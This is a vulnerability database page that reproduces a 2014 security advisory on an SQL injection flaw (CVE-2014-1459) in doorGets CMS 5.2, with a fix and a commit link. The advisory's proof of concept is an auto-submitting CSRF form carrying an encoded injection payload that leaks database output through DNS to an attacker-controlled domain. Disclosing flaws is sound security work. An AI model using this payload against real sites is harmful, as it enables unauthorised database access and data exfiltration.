Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHigh-Tech Bridge1337DAY-ID-21872
HistoryFeb 08, 2014 - 12:00 a.m.

doorGets CMS 5.2 - SQL Injection Vulnerability

2014-02-0800:00:00
High-Tech Bridge
0day.today
27

EPSS

0.002

Percentile

52.9%

JSON

Exploit for php platform in category web applications

Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in doorGets CMS, which can be exploited to perform SQL Injection attacks.
 
 
1) SQL Injection in doorGets CMS: CVE-2014-1459
 
The vulnerability exists due to insufficient validation of "_position_down_id" HTTP POST parameter passed to "/dg-admin/index.php" script. A remote attacker with access to administrative interface can execute arbitrary SQL commands in application's database. This vulnerability however can be exploited by a remote unauthenticated user via CSRF vector.
 
The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will use a CSRF vector to send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
 
 
<form action="http://[host]/dg-admin/?controller=rubriques" method="post" name="main">
<input type="hidden" name="_position_down_id" value="1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">
<input type="hidden" name="_position_down_position" value="1">
<input type="hidden" name="_position_down_submit" value="1">
<input type="hidden" name="_position_down_type" value="down">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Fixed by vendor on January 15, 2014 directly in the source code without version modification/new release. Update to the version 5.2 released after January 15, 2014.
 
More Information:
https://github.com/doorgets/doorGets/commit/6b81541fc1e5dd1c70614585c1a04d04ccdb3b19

#  0day.today [2018-02-10]  #

Related

packetstorm 1
securityvulns 2
exploitdb 1
htbridge 1
cve 1
prion 1
cvelist 1
exploitpack 1
seebug 1
nvd 1
packetstorm
packetstorm
doorGets CMS 5.2 SQL Injection
2014-02-06 00:00:00
securityvulns
securityvulns
SQL Injection in doorGets CMS
2014-02-11 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-02-11 00:00:00
exploitdb
exploitdb
doorGets CMS 5.2 - SQL Injection
2014-02-07 00:00:00
htbridge
htbridge
SQL Injection in doorGets CMS
2014-01-15 00:00:00
cve
cve
CVE-2014-1459
2014-02-11 17:55:06
prion
prion
Sql injection
2014-02-11 17:55:00
cvelist
cvelist
CVE-2014-1459
2014-02-11 17:00:00
exploitpack
exploitpack
doorGets CMS 5.2 - SQL Injection
2014-02-07 00:00:00
seebug
seebug
doorGets CMS SQL注入漏洞
2014-02-08 00:00:00
nvd
nvd
CVE-2014-1459
2014-02-11 17:55:06

EPSS

0.002

Percentile

52.9%

JSON
Related for 1337DAY-ID-21872
packetstorm1securityvulns2exploitdb1htbridge1cve1prion1cvelist1exploitpack1seebug1nvd1